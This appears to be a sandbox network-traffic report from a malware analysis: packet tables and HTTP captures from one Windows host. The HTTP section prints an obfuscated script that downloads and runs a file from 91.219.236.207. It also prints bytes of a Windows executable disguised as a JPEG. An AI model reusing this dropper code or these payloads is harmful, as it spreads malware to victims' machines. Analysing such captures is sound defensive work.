Sep 12, 2017 22:19:04.038943052 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.038954973 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.039155960 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.068969965 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.069242001 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.069350958 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.069380045 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.069427967 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.077728987 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.079159021 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.079197884 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.079293966 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.079319954 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.084600925 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.128868103 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.128907919 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.166733980 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.166960955 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.622251987 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.718770027 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.718853951 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.874424934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.874459028 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.874471903 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.874599934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.874633074 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.874670029 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.874703884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.875458956 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.875531912 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.875714064 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.875734091 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.875847101 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.875874996 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.876523018 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.901089907 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.901267052 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:17.997066021 MESZ	49194	80	192.168.1.16	91.219.236.207

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 12, 2017 22:18:26.005532980 MESZ	61484	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:26.427146912 MESZ	53	61484	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:27.554347038 MESZ	54797	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:27.864702940 MESZ	53	54797	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:30.424084902 MESZ	58435	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:30.985002041 MESZ	53	58435	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:31.082403898 MESZ	51184	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:31.512681007 MESZ	53	51184	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:32.703862906 MESZ	51632	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:33.142751932 MESZ	53	51632	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:33.232844114 MESZ	57086	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:33.579993010 MESZ	53	57086	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:42.780735016 MESZ	58475	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:43.067595005 MESZ	53	58475	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:43.075220108 MESZ	63992	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:43.308604956 MESZ	53	63992	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:49.609841108 MESZ	56587	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:49.738922119 MESZ	53	56587	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:51.304805040 MESZ	56657	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:51.401050091 MESZ	53	56657	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:51.409154892 MESZ	64336	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:51.549576998 MESZ	53	64336	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 12, 2017 22:18:49.609841108 MESZ	192.168.1.16	8.8.8.8	0x5f98	Standard query (0)	clienttemplates.content.office.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Sep 12, 2017 22:18:49.738922119 MESZ	8.8.8.8	192.168.1.16	0x5f98	No error (0)	clienttemplates.content.office.net		88.221.14.177	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

91.219.236.207

clienttemplates.content.office.net

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Sep 12, 2017 22:17:48.055948973 MESZ	49193	80	192.168.1.16	91.219.236.207	GET /img/office.png HTTP/1.1 Host: 91.219.236.207 Connection: Keep-Alive	0
Sep 12, 2017 22:17:48.579154968 MESZ	80	49193	91.219.236.207	192.168.1.16	HTTP/1.1 200 OK Date: Tue, 12 Sep 2017 20:18:27 GMT Server: Apache X-Frame-Options: SAMEORIGIN Last-Modified: Wed, 23 Aug 2017 13:46:21 GMT Accept-Ranges: bytes Content-Length: 1065 X-XSS-Protection: 1; mode=block Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/png Data Raw: 3c 64 65 66 69 6e 69 74 69 6f 6e 73 20 0a 20 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 77 73 64 6c 2f 22 20 0a 20 20 20 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 77 73 64 6c 2f 73 6f 61 70 2f 22 20 0a 20 20 20 20 78 6d 6c 6e 73 3a 73 75 64 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 77 73 64 6c 2f 73 75 64 73 22 20 0a 20 20 20 20 78 6d 6c 6e 73 3a 74 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 Data Ascii: <definitions xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:suds="http://www.w3.org/2000/wsdl/suds" xmlns:tns="http://sche	0
Sep 12, 2017 22:17:48.780488968 MESZ	80	49193	91.219.236.207	192.168.1.16	Data Raw: 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 63 6c 72 2f 6e 73 2f 53 79 73 74 65 6d 22 20 0a 20 20 20 20 78 6d 6c 6e 73 3a 6e 73 30 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 63 6c 72 2f Data Ascii: mas.microsoft.com/clr/ns/System" xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo"> <portType name="PortType"/> <binding name="Binding" type="tns:PortType"> <soap:binding style="rpc" transport="http://schemas.	1
Sep 12, 2017 22:17:53.082751989 MESZ	49194	80	192.168.1.16	91.219.236.207	GET /img/word.db HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.219.236.207 Connection: Keep-Alive	2
Sep 12, 2017 22:17:53.673261881 MESZ	80	49194	91.219.236.207	192.168.1.16	HTTP/1.1 200 OK Date: Tue, 12 Sep 2017 20:18:32 GMT Server: Apache X-Frame-Options: SAMEORIGIN Last-Modified: Wed, 23 Aug 2017 13:45:58 GMT Accept-Ranges: bytes Content-Length: 3007 X-XSS-Protection: 1; mode=block Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 40 00 00 00 da 08 02 00 00 00 58 78 0c 6c 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 0d 5f 49 44 41 54 78 5e ed 9d eb 7a dc 38 0e 44 f3 fe 2f 3d 9b 59 79 b5 ed 6e b5 04 10 17 02 e4 f1 af f9 32 20 04 9e aa 32 25 b5 9d fc f9 87 2f 08 40 a0 2d 81 3f 6d 27 67 70 08 40 e0 1f 02 8c 09 20 d0 98 00 01 6e 2c 1e a3 43 80 00 e3 01 08 34 26 40 80 1b 8b c7 e8 10 20 c0 78 00 02 8d 09 10 e0 c6 e2 31 3a 04 08 30 1e 80 40 63 02 04 b8 b1 78 8c 0e 01 02 8c 07 20 d0 98 00 01 6e 2c 1e a3 43 80 00 e3 01 08 28 08 fc f9 f8 52 2c 0e 28 25 c0 01 50 69 b9 22 81 23 b9 6f 3b fb fc 93 e4 ad 13 e0 64 e0 5c ae 07 01 e1 49 4b 80 7b c8 c9 94 eb 11 f8 8c e8 eb 9f 08 f7 4b 80 85 a0 28 83 c0 20 81 6f 41 1d 6c f7 7b 19 01 76 c1 48 13 08 fc 10 10 de fa 7a f1 22 c0 5e 24 47 fa 4c a7 3f 32 34 6b 3e ce c0 81 5b 5f 2f 8a d3 2d b4 f5 4b ac e9 f4 bd 6c b4 55 9f b7 33 76 ee de a7 5b 68 df 00 5f 7e 2a 30 d7 0d 5c fd 93 40 f2 2d b1 56 82 ba 01 2e f5 7d 4e 8b f5 b1 7e 3a f7 c7 09 b7 2d e8 65 bc e9 46 fa 7a 02 bf 4d b6 d8 79 35 9d fb b6 f9 7c 3c 63 7b 91 99 6e 24 69 80 0f ac c5 ef 67 84 da 4f 87 2e 9c 73 c9 b2 35 2c 74 4a 33 dd 4b ba 00 df 7f fb 6c 61 b8 e9 c4 5b 50 72 19 f2 f2 03 58 97 ce 75 9a 4c b7 d3 75 80 c7 c6 9a f8 36 5f a2 e8 62 4f 01 92 2d 47 d7 7c fb 19 89 7d 50 8f 25 c5 51 17 cf 00 bf 8e 75 23 ad e3 f4 c2 56 fb f8 49 08 44 5b f6 4d 4d 6d 9f c5 ea a7 a7 f7 df a7 da cb bb e2 50 d0 c9 07 75 05 ca a1 3c dd 9b 2f f6 98 ea ce a7 ce 03 f0 45 80 93 ed 1e 14 e6 a0 b6 71 56 98 d8 99 b8 0e c3 4f 0e cb e5 9c 85 7e bf d1 e8 a4 3d 43 7b ff 14 2a f9 bf c3 f6 dd 7c 61 85 f4 ce 3f 81 ef 4d 20 f1 df 59 b3 89 9f de 98 6c b2 eb 82 db ac 18 e0 22 33 15 54 6b d6 48 c6 bb 92 59 63 2f 7f dd 3a 49 f9 75 0b 5d 67 ac e5 1d 70 fd 3c f3 91 d7 3d 39 d4 df 75 9d a4 10 e0 39 6e b9 7c 3a 98 33 0a 57 d5 13 20 c0 7a 66 6d 57 90 d5 b6 d2 5d 0f 5e 27 bd bf 5e 62 95 1a ab a9 e4 64 b5 a9 70 aa b1 4b 25 e5 ff b7 d0 a5 c6 52 01 9d 5b bc e7 c7 57 73 99 4f bc 7a b5 98 10 60 ab 19 aa 29 6a dd 0f eb bf 13 28 a8 35 01 36 19 b6 a0 a2 a6 fd b0 f8 96 40 41 b9 09 30 9e 85 80 94 00 01 96 92 a2 0e 02 05 09 10 e0 82 a2 30 12 04 1a 13 e0 16 ba b1 78 8c 0e 01 02 8c 07 20 d0 98 00 01 6e 2c 1e a3 43 80 00 e3 01 08 34 26 40 80 1b 8b c7 e8 10 20 c0 78 00 02 8d 09 10 e0 c6 e2 59 46 2f f8 91 a6 65 3b db ae 25 c0 9b 4a 7f fc 0e c6 a6 9b 5f 68 db 04 78 21 31 f5 5b 21 c3 7a 66 b5 56 10 e0 5a 7a e4 4f 43 86 f3 99 3b 5e 91 00 3b c2 ec da 8a 0c 77 55 ee f5 5f 66 40 c5 be 2a da 27 47 7d 3b c3 29 1d 38 81 a7 60 2f 77 51 02 5c 4e 12 d9 40 04 58 c6 69 83 2a 32 dc 51 64 02 dc 51 b5 a8 99 c9 70 14 d9 b0 be 04 38 0c 6d c3 c6 04 b8 9d 68 15 03 cc cf 18 4c b4 11 19 9e 08 7f e0 d2 15 03 7c 6c 03 27 0d c8 e9 b2 04 f2 2e 18 73 9a d4 0d 30 19 ce 71 c0 e7 55 08 f0 2c f2 03 d7 2d 1d e0 23 c3 f8 69 40 57 e3 12 98 bf 01 7c fd eb fb cf ff 36 42 76 59 de e3 1f 37 c3 4f 2e 62 ab 9a 6c cb bc 6c 56 2f e5 7b ff 7d 94 b7 e9 55 92 87 16 6f eb a7 50 aa 37 cd 37 01 fe 19 d7 59 c0 c7 ae fb f0 0b 65 97 df 8d 66 dd d6 6e 62 a9 31 21 23 56 2d 06 bc d7 d1 2a 14 74 fc 37 42 a7 9c d5 8b 59 4a 28 d2 ac b2 8e b4 4b 1d 39 09 c2 8d 07 78 d6 53 fe ac f3 3f 41 8c 82 97 a8 9c e1 25 4f 54 ad 07 dc 02 7c fd 84 1d f6 0e b9 b2 b1 b4 1a 14 af 2f 82 ba fb c3 6a 90 ca b1 01 3e 3e 07 8a 1a 3d ac 73 d0 c0 4d db c6 29 78 ff 0a 6d ca 33 5a 3b 8d a2 d2 75 82 08 95 3f b4 79 3b 2d e3 06 0e e5 cc 9d b0 45 b8 de 01 0e 3d e1 2d 58 17 5b eb 12 e0 6f af 97 16 63 95 bc 9d f6 01 26 c3 Data Ascii: IHDR@XxlsRGBgAMAapHYsod_IDATx^z8D/=Yyn2 2%/@-?m'gp@ n,C4&@ x1:0@cx n,C(R,(%Pi"#o;d\IK{K( oAl{vHz"^$GL?24k>[_/-KlU3v[h_~0\@-V.}N~:-eFzMy5\|<c{n$igO.s5,tJ3Kla[PrXuLu6_bO-G\|}P%Qu#VID[MMmPu</EqVO~=C{\|a?M Yl"3TkHYc/:Iu]gp<=9u9n\|:3W zfmW]^'^bdpK%R[WsOz`)j(56@A00x n,C4&@ xYF/e;%J_hx!1[!zfVZzOC;^;wU_f@'G};)8`/wQ\N@Xi2QdQp8mhL\|l'.s0qU,-#i@W\|6BvY7O.bllV/{}UoP77Yefnb1!#V-*t7BYJ(K9xS?A%OT\|/j>>=sM)xm3Z;u?y;-E=-X[oc&	3
Sep 12, 2017 22:17:53.673274040 MESZ	80	49194	91.219.236.207	192.168.1.16	Data Raw: 39 8e 11 66 78 b7 97 c0 39 f0 ef 9e 35 a2 27 10 0a 6f 1c 83 57 d3 46 80 92 e5 af 52 72 9c 4a 88 25 d4 ac 70 02 e7 3c 6f 27 88 51 f3 12 3c a3 d6 d4 e5 98 6a a9 00 73 3b 6d b4 da 63 56 73 ee a7 8c bb d8 6a f9 6a 01 26 c3 72 fb 0e 7c b2 4a 80 e5 78 Data Ascii: 9fx95'oWFRrJ%p<o'Q<js;mcVsjj&r\|Jxs*0fOVpN2WY3dwd/#.,M2\|M\:{z>+xO(poi_C[IEtY?]2\?%8@e51HS5b[+W8Fr/]T\c~g<]!n82	5
Sep 12, 2017 22:17:53.673281908 MESZ	80	49194	91.219.236.207	192.168.1.16	Data Raw: 4f 22 2b 22 62 6a 65 22 2b 22 63 74 20 53 79 73 22 2b 22 74 65 6d 2e 22 2b 22 4e 65 22 2b 22 74 2e 57 65 22 2b 22 62 43 6c 69 65 22 2b 22 6e 74 29 2e 44 22 2b 22 6f 77 6e 6c 22 2b 22 6f 61 64 22 2b 22 46 Data Ascii: O"+"bje"+"ct Sys"+"tem."+"Ne"+"t.We"+"bClie"+"nt).D"+"ownl"+"oad"+"F	5
Sep 12, 2017 22:17:53.712901115 MESZ	80	49194	91.219.236.207	192.168.1.16	Data Raw: 22 2b 22 69 6c 65 28 27 68 74 74 70 3a 2f 2f 39 31 2e 32 31 39 2e 32 33 36 2e 32 30 37 2f 69 6d 67 2f 6c 65 66 74 2e 6a 70 67 27 2c 20 27 25 68 6f 6d 65 70 61 74 68 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4d 69 63 72 6f 73 6f 66 74 Data Ascii: "+"ile('http://91.219.236.207/img/left.jpg', '%homepath%\AppData\Roaming\Microsoft\Windows\" & RndName & "');",0,true : Office.run """" & appData & """",0,false : self.close</script>pwkxk\|w5l;]AZ~6 oMo-?	6
Sep 12, 2017 22:18:36.423420906 MESZ	49199	80	192.168.1.16	91.219.236.207	GET /img/left.jpg HTTP/1.1 Host: 91.219.236.207 Connection: Keep-Alive	26
Sep 12, 2017 22:18:47.092717886 MESZ	80	49199	91.219.236.207	192.168.1.16	HTTP/1.1 200 OK Date: Tue, 12 Sep 2017 20:19:26 GMT Server: Apache X-Frame-Options: SAMEORIGIN Last-Modified: Wed, 23 Aug 2017 13:46:57 GMT Accept-Ranges: bytes Content-Length: 1383424 X-XSS-Protection: 1; mode=block Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 f6 85 bc e2 97 eb ef e2 97 eb ef e2 97 eb ef c5 51 90 ef e0 97 eb ef c5 51 85 ef f2 97 eb ef bb b4 f8 ef e9 97 eb ef e2 97 ea ef 67 97 eb ef c5 51 96 ef ee 97 eb ef c5 51 86 ef ba 97 eb ef c5 51 95 ef e3 97 eb ef c5 51 97 ef e3 97 eb ef c5 51 93 ef e3 97 eb ef 52 69 63 68 e2 97 eb ef 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 4d b9 57 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 e0 01 00 00 38 13 00 00 00 00 00 64 ae 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 40 15 00 00 04 00 00 e7 9c 15 00 02 00 40 81 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc b7 00 00 8c 00 00 00 00 10 02 00 08 1f 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 12 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 e0 01 00 00 10 00 00 00 e0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 00 20 00 00 00 f0 01 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 1f 13 00 00 10 02 00 00 20 13 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 10 00 00 00 30 15 00 00 04 00 00 00 18 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 bc 00 00 0a bd 00 00 1a bd 00 00 2e bd 00 00 e4 bc 00 00 00 00 00 00 36 ba 00 00 1c ba 00 00 0c ba 00 00 02 ba 00 00 00 00 00 00 18 be 00 00 04 be 00 00 ea bd 00 00 d4 bd 00 00 ba bd 00 00 a6 bd 00 00 88 bd 00 00 6a bd 00 00 54 bd 00 00 e4 b9 00 00 c8 b9 00 00 b2 b9 00 00 a2 b9 00 00 9a b9 00 00 8c b9 00 00 2c be 00 00 00 00 00 00 6a bb 00 00 72 bb 00 00 94 ba 00 00 a0 ba 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$QQgQQQQQRichPELMW8d@@@ 0X@$.text `.data @.rsrc @@.reloc0@B.6jT,jr	30
Sep 12, 2017 22:18:47.092752934 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: 00 b4 ba 00 00 c2 ba 00 00 d4 ba 00 00 e4 ba 00 00 f8 ba 00 00 0c bb 00 00 1a bb 00 00 2a bb 00 00 38 bb 00 00 4a bb 00 00 74 ba 00 00 56 ba 00 00 86 ba 00 00 5e bb 00 00 00 00 00 00 f8 bb 00 00 0a bc 00 00 14 bc 00 00 1c bc 00 00 2a bc 00 00 32 Data Ascii: 8JtV^2>L`p@=K@@o@MWq\	32
Sep 12, 2017 22:18:47.092766047 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: 8d b0 93 f0 28 60 d1 e6 f9 8d b6 93 07 20 60 0b b1 31 00 00 00 0f af f2 f9 03 b1 0c 00 00 00 0f ce be ea 3f 59 09 d3 ee d3 e6 59 5e 68 d5 0b 31 0f 51 31 c9 59 0f 84 e2 02 00 00 55 8b ec 50 57 bf 52 6c 41 00 0f c8 d3 e0 0f a4 e0 07 8b c1 0f ac c8 Data Ascii: (` `1?YY^h1Q1YUPWRlAfqPp#O;73"cX_XhO1R1ZUVU~A75@&Z+'+3]^h1R1Z4URVj@	32
Sep 12, 2017 22:18:47.124105930 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: 50 51 b9 59 7e 40 00 0b 81 22 00 00 00 d3 e8 8d 80 1a c1 84 5e 81 e0 cd ee d6 13 8b 81 20 00 00 00 81 f0 96 6c 14 d2 81 c8 e5 41 14 1f 8b c0 d1 e8 59 58 68 0e 0f 31 0f 51 29 c9 59 0f 84 a5 00 00 00 55 8b ec 53 55 bd 2d ab 40 00 bb f0 aa 66 01 81 Data Ascii: PQY~@"^ lAYXh1Q)YUSU-@ff'+][hm1R1Z`UPV&AMin+!+"%^Xh1Q1YUEj3hC@IHH}	34
Sep 12, 2017 22:18:47.124142885 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: 00 00 00 0f 87 33 01 00 00 0f 86 2d 01 00 00 82 0e 80 ac 2a 99 8b 8d f1 11 00 00 0f 80 e9 fd ff ff 0f 81 e3 fd ff ff 31 c4 1d 8b 78 08 0f 84 8c fd ff ff 0f 85 86 fd ff ff 1f 26 d1 0f 85 29 fb ff ff 0f 8a 31 fb ff ff 0f 8b 2b fb ff ff 8e 0f 7a 37 Data Ascii: 3-*1x&)1+z7h:4.Vh;hrlqDtuZSb~xQYW	36
Sep 12, 2017 22:18:47.124155998 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: a4 0f 82 03 01 00 00 0f 83 fd 00 00 00 9a c4 d4 ea fc 05 0f 8e 02 01 00 00 0f 8f fc 00 00 00 2e 9c 7d 5e d1 e8 00 00 00 00 5d 0f 84 d8 fe ff ff 0f 85 d2 fe ff ff 49 0f b6 43 3f 0f 84 43 fe ff ff 0f 85 3d fe ff ff 09 2d 8b 95 34 09 00 00 72 15 73 Data Ascii: .}^]IC?C=-4rs_T3`YRQP2,#.5rkC$t$t)u'y6C\|g`<]$+	37
Sep 12, 2017 22:18:47.126447916 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: e5 75 e3 ec 3a d2 8b cf 0f 80 e5 fe ff ff 0f 81 df fe ff ff 71 2e 33 c0 0f 8e 1d 01 00 00 0f 8f 17 01 00 00 85 7a 52 0f 85 f1 fe ff ff 74 15 75 13 11 5f 12 a0 0f 31 0f 88 3c 02 00 00 0f 89 36 02 00 00 d7 03 b5 28 03 00 00 0f 80 49 01 00 00 0f 81 Data Ascii: u:q.3zRtu_1<6(ICIt/u-PzE2RD$/A}t *$q0h<'Yrsa\\|$$	38
Sep 12, 2017 22:18:47.126486063 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: 4e 73 4c 13 89 47 01 74 08 75 06 63 07 10 03 3d 9b c6 47 05 6c 74 b5 75 b3 01 2c 1a 43 6e c1 8b 7b 50 0f 84 96 00 00 00 0f 85 90 00 00 00 00 d9 1e ba 58 7a 34 7b 32 7b 83 e0 2f 77 43 76 41 b8 60 d8 eb 8b 43 0c 70 bc 71 ba 26 27 6c 39 42 66 c7 07 Data Ascii: NsLGtuc=Gltu,Cn{PXz4{2{/wCvA`Cpq&'l9Bft<u:{7pqc,z{z]{[KM\|+vpjf71g<6W*z}HC,qkptunxTyRz{rsm!h	40
Sep 12, 2017 22:18:47.126496077 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: a1 e8 44 fe da 16 a9 80 00 00 00 78 ec 79 ea 2d c2 8b 43 2c 77 0f 76 0d aa ff 63 1c 78 0e 79 0c 12 8a 5f fd be 8b 00 74 dd 75 db 26 ff 63 18 77 10 76 0e 8b 52 d9 2e 19 8d 4b 40 74 d4 75 d2 88 75 7a 49 7b 47 ca f5 e3 4d f4 f4 94 0f 95 c2 72 46 73 Data Ascii: Dxy-C,wvcxy_tu&cwvR.K@tuuzI{GMrFsD:xfydQ.n!xy".xyo5C,rNsL~Q+pqSArtu=K@rsF5?cw'v%Gowuxy^%cxy tuH=t~u\|}	41
Sep 12, 2017 22:18:47.136589050 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: 74 f1 75 ef c1 68 13 ee 7c 43 a9 01 00 00 00 74 ab 75 a9 c3 8d 4b 40 7e 95 7f 93 e3 b1 6e d5 c2 ad ea 74 0d 75 0b 60 49 e8 89 43 08 78 18 79 16 ce 8d 4b 40 7e 38 7f 36 4c 62 8b 09 77 1a 76 18 34 c1 15 57 7a 62 83 03 18 77 30 76 2e cc 50 18 ff 63 Data Ascii: tuh\|CtuK@~ntu`ICxyK@~86Lbwv4Wzbw0v.Pcw2v0!tu5c,xy.T:Ctu_YSCz{h3J[t3u1Zct?u=J~u6rsQ~42~K@p8q65(]tu!@@~Pcz,{$u~Cd{dC,tu	42
